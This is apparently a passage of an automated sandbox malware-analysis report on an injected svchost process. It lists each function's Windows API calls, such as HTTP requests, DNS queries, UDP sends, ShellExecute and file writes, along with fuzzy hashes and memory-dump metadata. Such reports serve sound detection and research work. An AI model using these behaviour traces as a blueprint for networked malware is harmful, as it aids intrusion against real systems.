                                                                                                                                                                                • StrStrA.SHLWAPI(00000000,131414A0,?,00000000,00000000,?,?), ref: 131504DE
                                                                                                                                                                                • StrStrA.SHLWAPI(00000000,131414A0,00000000), ref: 13150515
                                                                                                                                                                                • StrStrA.SHLWAPI(00000001,131414A0), ref: 13150541
                                                                                                                                                                                • StrStrA.SHLWAPI(?,131414A0), ref: 13150574
                                                                                                                                                                                • StrStrA.SHLWAPI(00000000,131413AC), ref: 1315058E
                                                                                                                                                                                • StrStrA.SHLWAPI(00000000,1314149C), ref: 1315059A
                                                                                                                                                                                • wnsprintfA.SHLWAPI ref: 131505BF
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wnsprintf
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 167729887-0
                                                                                                                                                                                • Opcode ID: 9777119513a1fcbf600301b3c42d007433eed3ddca439ccfbffba44267e20fe0
                                                                                                                                                                                • Instruction ID: 243af7390c0885436e9854db75e32d55ee869c31370201af5ee67116e9b61509
                                                                                                                                                                                • Opcode Fuzzy Hash: 9777119513a1fcbf600301b3c42d007433eed3ddca439ccfbffba44267e20fe0
                                                                                                                                                                                • Instruction Fuzzy Hash: 5C61AF75A01249FFDF114FA5CD40FAE3F6AAF87254F198029FC749A2A0CB31D941DA60
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • getSystemCP.LIBCMT ref: 131544B8
                                                                                                                                                                                  • Part of subcall function 13154425: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 13154432
                                                                                                                                                                                  • Part of subcall function 13154425: GetOEMCP.KERNEL32(00000000), ref: 1315444C
                                                                                                                                                                                • setSBCS.LIBCMT ref: 131544CA
                                                                                                                                                                                  • Part of subcall function 13154120: _memset.LIBCMT ref: 13154133
                                                                                                                                                                                • IsValidCodePage.KERNEL32(-00000030), ref: 13154510
                                                                                                                                                                                • GetCPInfo.KERNEL32(00000000,?), ref: 13154523
                                                                                                                                                                                • _memset.LIBCMT ref: 1315453B
                                                                                                                                                                                • setSBUpLow.LIBCMT ref: 1315460E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Locale_memset$CodeInfoPageSystemUpdateUpdate::_Valid
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2658552758-0
                                                                                                                                                                                • Opcode ID: af18a46d693f277a3becd28f6804c801e3623c72dd25ab6cf07ae02fca43cde2
                                                                                                                                                                                • Instruction ID: 5c1de8df099469ff0dda55c5d4dbde2984e7a614063db4ef8b63bf716e2067d3
                                                                                                                                                                                • Opcode Fuzzy Hash: af18a46d693f277a3becd28f6804c801e3623c72dd25ab6cf07ae02fca43cde2
                                                                                                                                                                                • Instruction Fuzzy Hash: EE51F531B842559BCF15CF69C5806AABBB5FF07301F19816AF8A2AF142DF38D446CB90
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 13145048
                                                                                                                                                                                • InternetConnectA.WININET(00000000,00000003,00000000,00000000,00000000,00000003,00000000,00000000), ref: 13145068
                                                                                                                                                                                • HttpOpenRequestA.WININET(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1314507D
                                                                                                                                                                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 1314508E
                                                                                                                                                                                • HttpQueryInfoA.WININET(00000000,00000005,?,00000000), ref: 131450AB
                                                                                                                                                                                • InternetReadFile.WININET(00000000,00000000,0000000A,0000000A), ref: 131450E3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HttpInternet$OpenRequest$ConnectFileInfoQueryReadSend
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2757949531-0
                                                                                                                                                                                • Opcode ID: 22a331550de01ec2645564005e4bf32a19f9b79704b9f3f78d1406bbc28db17e
                                                                                                                                                                                • Instruction ID: 3e48ee776b3adc7c9bad0b04ab65395fd94d74b2f812049d15b6b2da66a3f4e7
                                                                                                                                                                                • Opcode Fuzzy Hash: 22a331550de01ec2645564005e4bf32a19f9b79704b9f3f78d1406bbc28db17e
                                                                                                                                                                                • Instruction Fuzzy Hash: 55211A7A601228FBCB219BA5CD88DDF7EBCEF46AA4B244465F505E2540E7748A00DAF0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • TlsGetValue.KERNEL32(00000000,13153CD0,1315290D,?,?,13152F12,?,00000001,?,131523E7,00000018,13156968,0000000C,13152476,?), ref: 13152A24
                                                                                                                                                                                • TlsGetValue.KERNEL32(FFFFFFFF,?,13152F12,?,00000001,?,131523E7,00000018,13156968,0000000C,13152476,?,?,?,131520C2,0000000E), ref: 13152A3B
                                                                                                                                                                                • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,13152F12,?,00000001,?,131523E7,00000018,13156968,0000000C,13152476,?,?,?,131520C2,0000000E), ref: 13152A50
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 13152A6B
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Value$AddressHandleModuleProc
                                                                                                                                                                                • String ID: DecodePointer$KERNEL32.DLL
                                                                                                                                                                                • API String ID: 1929421221-629428536
                                                                                                                                                                                • Opcode ID: d3e6ce9aa681a1f1d64aa8754bc4b29a2fa9782f9ebf582eeb7384410117f2df
                                                                                                                                                                                • Instruction ID: 51f9909ef42d79873867bfb9de5710e1842ae3eaa590c20a3a01065d34695617
                                                                                                                                                                                • Opcode Fuzzy Hash: d3e6ce9aa681a1f1d64aa8754bc4b29a2fa9782f9ebf582eeb7384410117f2df
                                                                                                                                                                                • Instruction Fuzzy Hash: 7AF0B436A016329FD726AB34CD849EA3FE49F0765470E9430F835D2568DB34CC038AB1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • TlsGetValue.KERNEL32(00000000,13152A15,00000000,13154BB5,00000000,00000000,00000314,?,?,?,1468EFD8,131530EF,1468EFD8,Microsoft Visual C++ Runtime Library,00012010), ref: 131529AD
                                                                                                                                                                                • TlsGetValue.KERNEL32(FFFFFFFF,?,?,?,1468EFD8,131530EF,1468EFD8,Microsoft Visual C++ Runtime Library,00012010), ref: 131529C4
                                                                                                                                                                                • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,1468EFD8,131530EF,1468EFD8,Microsoft Visual C++ Runtime Library,00012010), ref: 131529D9
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 131529F4
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Value$AddressHandleModuleProc
                                                                                                                                                                                • String ID: EncodePointer$KERNEL32.DLL
                                                                                                                                                                                • API String ID: 1929421221-3682587211
                                                                                                                                                                                • Opcode ID: fd7ebc49492c195ac40f35a3bcc415d9885276f82af5efdcc6ad24769fc2db4a
                                                                                                                                                                                • Instruction ID: ee033adfa20d7b5162f0d990e6246f8c85a8aadc165d10402fe02678524f2fd1
                                                                                                                                                                                • Opcode Fuzzy Hash: fd7ebc49492c195ac40f35a3bcc415d9885276f82af5efdcc6ad24769fc2db4a
                                                                                                                                                                                • Instruction Fuzzy Hash: A5F0B436A016739FD71AAB34CD44AEA3FE49F0265570A5135F834D2264DB34D843DBB1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e9483793b51f18562a042eab7b94ad45d390c3c37eb3d74f0cf4db488e0e7b62
                                                                                                                                                                                • Instruction ID: 6fdbef346fd8525ead6d0797cac569ecc0bda0291445e6b593981b95549a5816
                                                                                                                                                                                • Opcode Fuzzy Hash: e9483793b51f18562a042eab7b94ad45d390c3c37eb3d74f0cf4db488e0e7b62
                                                                                                                                                                                • Instruction Fuzzy Hash: 21A171B1D00259AFEB01CBA4CD40BEEBFF9AF05244F384065ED51E7141E7769A45CBA1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 13144EA1: EnterCriticalSection.KERNEL32(00000000,1314E2F0,?,00000000,00000000,-00000004), ref: 13144EAC
                                                                                                                                                                                • StrStrA.SHLWAPI(1314E1E5,13141440,?,?,-00000004,0000008C,00000000,?,00000000), ref: 1314DE3A
                                                                                                                                                                                • StrStrA.SHLWAPI(1314E1E5,-00000004,0000008B,?,?,-00000004,0000008C,00000000,?,00000000), ref: 1314DE5F
                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32 ref: 1314DEC5
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1314DECB
                                                                                                                                                                                • wnsprintfA.SHLWAPI ref: 1314DEFB
                                                                                                                                                                                • ShellExecuteA.SHELL32(00000000,-00000004,0000008E,?,00000000,00000000), ref: 1314DF31
                                                                                                                                                                                  • Part of subcall function 13142F79: lstrlenA.KERNEL32(?,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 13142FDC
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CountCriticalDirectoryEnterExecuteSectionShellSystemTicklstrlenwnsprintf
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 995194965-0
                                                                                                                                                                                • Opcode ID: d61a759d89a3b4b0c9b4c207f298292ffb13940e9cf1be3464447091ad592608
                                                                                                                                                                                • Instruction ID: 13c1b9369066cdb6e4ed58d56a630e59443e24633ad642c3ed1b1b0e48a6ab49
                                                                                                                                                                                • Opcode Fuzzy Hash: d61a759d89a3b4b0c9b4c207f298292ffb13940e9cf1be3464447091ad592608
                                                                                                                                                                                • Instruction Fuzzy Hash: 587116B6A00354BFDF10DFA8CD9099E77B9EB42304F694079F445A7281DB74AA81CBA1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GdipAlloc.GDIPLUS(00000008,00000000,?,131475E5), ref: 1314F508
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocGdip
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1856340535-0
                                                                                                                                                                                • Opcode ID: aebcb12a3578fe10b01d8265182e782cd0a2cf7a18f50d2cb95028721df1330d
                                                                                                                                                                                • Instruction ID: 162bc25bd3c12c6731c916bea97d04466642709afc5277724cef78296615d18d
                                                                                                                                                                                • Opcode Fuzzy Hash: aebcb12a3578fe10b01d8265182e782cd0a2cf7a18f50d2cb95028721df1330d
                                                                                                                                                                                • Instruction Fuzzy Hash: 1541247AE40305ABCF069FBCC8845AEB7B5EF48241F39403DE541A7340DF35AA658BA0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • wnsprintfA.SHLWAPI ref: 1314D065
                                                                                                                                                                                  • Part of subcall function 13142F79: lstrlenA.KERNEL32(?,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 13142FDC
                                                                                                                                                                                • wnsprintfA.SHLWAPI ref: 1314D09E
                                                                                                                                                                                • DnsQuery_A.DNSAPI(?,0000000C,00000028,00000000,?,00000000), ref: 1314D0B1
                                                                                                                                                                                • StrStrIA.SHLWAPI(?,-00000004,000000BD,0000000C,00000028,00000000,?,00000000), ref: 1314D0D6
                                                                                                                                                                                • DnsRecordListFree.DNSAPI(?,?), ref: 1314D13E
                                                                                                                                                                                • GetLastError.KERNEL32(0000000C,00000028,00000000,?,00000000), ref: 1314D16B
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wnsprintf$ErrorFreeLastListQuery_Recordlstrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3873175859-0
                                                                                                                                                                                • Opcode ID: b9a01a87296449b41382b83979c05cedc972fd9e8370d67458ba98add1af47bf
                                                                                                                                                                                • Instruction ID: f6f7a0baabf7a0b2a30316a458c1fa14539f85eb32859fab4e0cd8c58dc0cc47
                                                                                                                                                                                • Opcode Fuzzy Hash: b9a01a87296449b41382b83979c05cedc972fd9e8370d67458ba98add1af47bf
                                                                                                                                                                                • Instruction Fuzzy Hash: 7F4118B16402596FEB26ABA8CC91BE63BDCEB15304FA80026FD60D2193D368D544DB31
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryExA.KERNEL32(-00000004,000000F5,00000000,00000000,00000004,00000001), ref: 13146E18
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,-00000004), ref: 13146E37
                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 13146E4D
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 13146E5E
                                                                                                                                                                                • wnsprintfA.SHLWAPI ref: 13146E88
                                                                                                                                                                                • wnsprintfA.SHLWAPI ref: 13146EAD
                                                                                                                                                                                  • Part of subcall function 13142F79: lstrlenA.KERNEL32(?,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 13142FDC
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LibraryTimewnsprintf$AddressFileFreeLoadProcSystemlstrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2555659749-0
                                                                                                                                                                                • Opcode ID: e0bff822e13d61dd72824745379a1d524290620c2234ef465190ce2767934253
                                                                                                                                                                                • Instruction ID: dabd049f6be1e818442d4598eb3b7bb778e403c5688bf6bd21f820f2eb6281ed
                                                                                                                                                                                • Opcode Fuzzy Hash: e0bff822e13d61dd72824745379a1d524290620c2234ef465190ce2767934253
                                                                                                                                                                                • Instruction Fuzzy Hash: 43215872D00229FBDF01EFA4CC859EE7B7CEF09B28F248465F905A2144E7719A51DBA1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • OpenFile.KERNEL32 ref: 13144B7A
                                                                                                                                                                                • OpenFile.KERNEL32 ref: 13144B92
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 13144B96
                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 13144BA2
                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,1314DF11,1314E1E5,00000000), ref: 13144BB4
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 13144BBB
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$Open$CloseErrorHandleLastPointerWrite
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1166246964-0
                                                                                                                                                                                • Opcode ID: 51cdfe6b6749e1e5a26ed3c2d898b94d31f371a768f9a6befa70090ac7cf3a87
                                                                                                                                                                                • Instruction ID: 15d8d02e8b926ec5a79a478293255d2b80f32c80bb54f5d0f4a4ab43e7174df0
                                                                                                                                                                                • Opcode Fuzzy Hash: 51cdfe6b6749e1e5a26ed3c2d898b94d31f371a768f9a6befa70090ac7cf3a87
                                                                                                                                                                                • Instruction Fuzzy Hash: 97F04F32601168BBDB246B66DC88DEF3FBDEB89664F008125FA09D3084DB748945DFB0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleA.KERNEL32(inetcomm.dll,00000000,00000000,00000067,?,?,?,?,?,?,?,?,?,1314DA6C,00000000), ref: 13146CE5
                                                                                                                                                                                • LoadLibraryA.KERNEL32(inetcomm.dll,?,?,?,?,?,?,?,?,?,1314DA6C,00000000), ref: 13146CF0
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HandleLibraryLoadModule
                                                                                                                                                                                • String ID: MimeOleGenerateMID$inetcomm.dll
                                                                                                                                                                                • API String ID: 4133054770-2511522974
                                                                                                                                                                                • Opcode ID: a4cf49e35a7a388d05d28bf54292f99f3453a17003bf44509ed285f636672002
                                                                                                                                                                                • Instruction ID: 89981d3dc23ffecf24b0d677873d8da3042bc58058477250c88c3045d2683477
                                                                                                                                                                                • Opcode Fuzzy Hash: a4cf49e35a7a388d05d28bf54292f99f3453a17003bf44509ed285f636672002
                                                                                                                                                                                • Instruction Fuzzy Hash: 25F0E571344312EBC3015B79AC48B8FB66CDFD59BEF254838F040F1104E72484415272
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a9c0f0ee489942955c4d027aee019131bbe61b98e97264bedac0433adbc81ef9
                                                                                                                                                                                • Instruction ID: 1bbd2eee5b8113a3cdaab39bed80c58b06cccd8305aefa2e4b8140a6d9484044
                                                                                                                                                                                • Opcode Fuzzy Hash: a9c0f0ee489942955c4d027aee019131bbe61b98e97264bedac0433adbc81ef9
                                                                                                                                                                                • Instruction Fuzzy Hash: 5CB190B5A00306EFDB14CFA8CC91E6ABBB9FF58304F204569E956EB691D730E911CB50
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • lstrcmpA.KERNEL32(1314DA4B,-00000004,00000042,-00000004,0000007A,00000000,1314E1E1,00000000,1314E1E5), ref: 1314D366
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: lstrcmp
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1534048567-0
                                                                                                                                                                                • Opcode ID: 12f2c09409d24c4e054f6c672668061102ef24238b7d1e7e0faab0b08158be4f
                                                                                                                                                                                • Instruction ID: b0c3233bf479d5e0ebebb69b3d0348cd5b8a8a69b5386fb8f37b81496b7ae10e
                                                                                                                                                                                • Opcode Fuzzy Hash: 12f2c09409d24c4e054f6c672668061102ef24238b7d1e7e0faab0b08158be4f
                                                                                                                                                                                • Instruction Fuzzy Hash: 4E61CFB5A00319ABDF119BA8CC81DAE7779EF81758F680425F505E7641EB38E981CBA0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • IsBadReadPtr.KERNEL32(?,00000004), ref: 131463A5
                                                                                                                                                                                • IsBadReadPtr.KERNEL32(?,00000004), ref: 131463BF
                                                                                                                                                                                • sendto.WS2_32(?,00000374,00000000,13161584,00000010), ref: 131463E7
                                                                                                                                                                                • Sleep.KERNEL32(000001F4), ref: 131463F1
                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 13146403
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Read$ExitProcessSleepsendto
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1614787347-0
                                                                                                                                                                                • Opcode ID: d2f4072409005e6626f78853b55f4e55af6a4931fd5888f89c96aeb35619061e
                                                                                                                                                                                • Instruction ID: 0fed5bbe40d5aac35426d1477084d13cd0d3141a98e6475887066ccef82ed279
                                                                                                                                                                                • Opcode Fuzzy Hash: d2f4072409005e6626f78853b55f4e55af6a4931fd5888f89c96aeb35619061e
                                                                                                                                                                                • Instruction Fuzzy Hash: EF21F5F2900358AFDB21EFE48DC0E9A732CAB05758F150974F61A67185E370BE48CB61
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • IsBadReadPtr.KERNEL32(00000008,00000001,00000018,00000000,131511EA,00000008,?,1314DF65,76B7EA30,1314E300,?,00000000,00000000,-00000004,00000049,00000000), ref: 1314EADE
                                                                                                                                                                                • WSASetLastError.WS2_32(00000000,?,1314DF65,76B7EA30,1314E300,?,00000000,00000000,-00000004,00000049,00000000), ref: 1314EAEF
                                                                                                                                                                                • shutdown.WS2_32(00000000,00000002), ref: 1314EAFA
                                                                                                                                                                                • WSAGetLastError.WS2_32(00000000,00000002,00000000,?,1314DF65,76B7EA30,1314E300,?,00000000,00000000,-00000004,00000049,00000000), ref: 1314EAFF
                                                                                                                                                                                • closesocket.WS2_32(00000000), ref: 1314EB08
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast$Readclosesocketshutdown
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4241232737-0
                                                                                                                                                                                • Opcode ID: 55044d7a4f543ff3f87d1ad7e6e7f63179eb35737f05c55234fbd4be03901f84
                                                                                                                                                                                • Instruction ID: 5c2a29b6aafa48c1bec0fafc417d801875d82609c2feba32a33d38c33df996b6
                                                                                                                                                                                • Opcode Fuzzy Hash: 55044d7a4f543ff3f87d1ad7e6e7f63179eb35737f05c55234fbd4be03901f84
                                                                                                                                                                                • Instruction Fuzzy Hash: 9BF04F35600240ABDB225F5EDC88D4A77A9EFC2B00B280538F4C5AB214EB216880CB71
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • Sleep.KERNEL32(00007530,76B7EA30,00000000,00000000), ref: 1314D8A6
                                                                                                                                                                                  • Part of subcall function 13144EA1: EnterCriticalSection.KERNEL32(00000000,1314E2F0,?,00000000,00000000,-00000004), ref: 13144EAC
                                                                                                                                                                                  • Part of subcall function 13144C1F: IsBadReadPtr.KERNEL32(00000000,00000004,00000000,00000000,131505E9,?,00000000,00000000), ref: 13144C32
                                                                                                                                                                                  • Part of subcall function 13144C1F: IsBadReadPtr.KERNEL32(00000000,00000001), ref: 13144C46
                                                                                                                                                                                  • Part of subcall function 13144C1F: HeapFree.KERNEL32(00000000,00000000), ref: 13144C5B
                                                                                                                                                                                • lstrlenA.KERNEL32(1314E1F2,?,?,?,?,?,00000000), ref: 1314D635
                                                                                                                                                                                • inet_ntoa.WS2_32(00000000), ref: 1314D720
                                                                                                                                                                                • wsprintfA.USER32 ref: 1314D746
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Read$CriticalEnterFreeHeapSectionSleepinet_ntoalstrlenwsprintf
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3707610853-0
                                                                                                                                                                                • Opcode ID: 51663f21bcf7e422acca725b706df896575aabc9a0bc1173ddc667c30757e91b
                                                                                                                                                                                • Instruction ID: c0d9678a5d6312c914dfe4a6ca5129e439d50c2ac836d23cb03dc97d3158bba4
                                                                                                                                                                                • Opcode Fuzzy Hash: 51663f21bcf7e422acca725b706df896575aabc9a0bc1173ddc667c30757e91b
                                                                                                                                                                                • Instruction Fuzzy Hash: 1DA1E8B5A00265AFDB08EF68C9D0C6577F9FB4524C7688438E906D7316EB34E985CF60
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • CharLowerA.USER32(00000000,131616E8,?,00000000), ref: 1314E8A5
                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,?,-00000004,00000060,?,00000000,-00000004,0000005F,?,00000000,-00000004,0000005E,?,00000000,-00000004,0000005D), ref: 1314E9C5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CharLower
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1615517891-0
                                                                                                                                                                                • Opcode ID: e15f2f67250bf7c819582e290c9eaea27e66e80e3beb9cdf804c5e2b29c6ed88
